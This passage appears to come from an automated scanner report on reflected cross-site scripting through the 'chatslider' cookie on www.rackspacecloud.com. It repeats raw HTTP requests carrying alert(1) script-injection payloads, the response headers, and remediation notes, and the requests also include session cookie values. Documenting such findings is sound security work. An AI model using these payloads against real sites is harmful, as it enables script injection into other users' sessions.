Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aboutus/story/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D86a93"%3balert(1)//3b3b8c9a118; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 38574
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 345f6"><script>alert(1)</script>5da5d11340d was submitted in the chatslider cookie. This input was echoed as 345f6\"><script>alert(1)</script>5da5d11340d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /blog/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D345f6"><script>alert(1)</script>5da5d11340d; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e7e2</script><script>alert(1)</script>cbd048d273a was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D4e7e2</script><script>alert(1)</script>cbd048d273a; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75ec3</script><script>alert(1)</script>29f4d6a2425 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/2010/12/14/rackspace-will-take-care-of-your-cloud-while-you-manage-your-business/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D75ec3</script><script>alert(1)</script>29f4d6a2425; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76b71"><script>alert(1)</script>a0a96c4691f was submitted in the chatslider cookie. This input was echoed as 76b71\"><script>alert(1)</script>a0a96c4691f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /blog/2010/12/14/rackspace-will-take-care-of-your-cloud-while-you-manage-your-business/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D76b71"><script>alert(1)</script>a0a96c4691f; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd5fa"><script>alert(1)</script>434fc0e542 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloudU HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-5-2_4--5+6--5_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296919127_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Ddd5fa"><script>alert(1)</script>434fc0e542; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.7.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:36:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 44440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1af78"%3balert(1)//fc1df1d7525 was submitted in the chatslider cookie. This input was echoed as 1af78";alert(1)//fc1df1d7525 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloudU HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-5-2_4--5+6--5_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296919127_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D1af78"%3balert(1)//fc1df1d7525; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.7.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:37:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 44394
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 219de"%3balert(1)//0249fa797b2 was submitted in the chatslider cookie. This input was echoed as 219de";alert(1)//0249fa797b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloudU/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D219de"%3balert(1)//0249fa797b2; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 44425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9236f"><script>alert(1)</script>36b0244798b was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloudU/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D9236f"><script>alert(1)</script>36b0244798b; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 44482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45758"><script>alert(1)</script>1279bf06213 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_demos HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D45758"><script>alert(1)</script>1279bf06213; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 40111
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a886c"%3balert(1)//7b6faca5503 was submitted in the chatslider cookie. This input was echoed as a886c";alert(1)//7b6faca5503 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_demos HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Da886c"%3balert(1)//7b6faca5503; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:29 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 40066
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8d52"%3balert(1)//52e1ba3187d was submitted in the chatslider cookie. This input was echoed as d8d52";alert(1)//52e1ba3187d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_demos/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Dd8d52"%3balert(1)//52e1ba3187d; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 40037
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68040"><script>alert(1)</script>f38fb66c69a was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_demos/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D68040"><script>alert(1)</script>f38fb66c69a; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 40112
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a4e2"%3balert(1)//a272c516181 was submitted in the chatslider cookie. This input was echoed as 5a4e2";alert(1)//a272c516181 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_faq/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
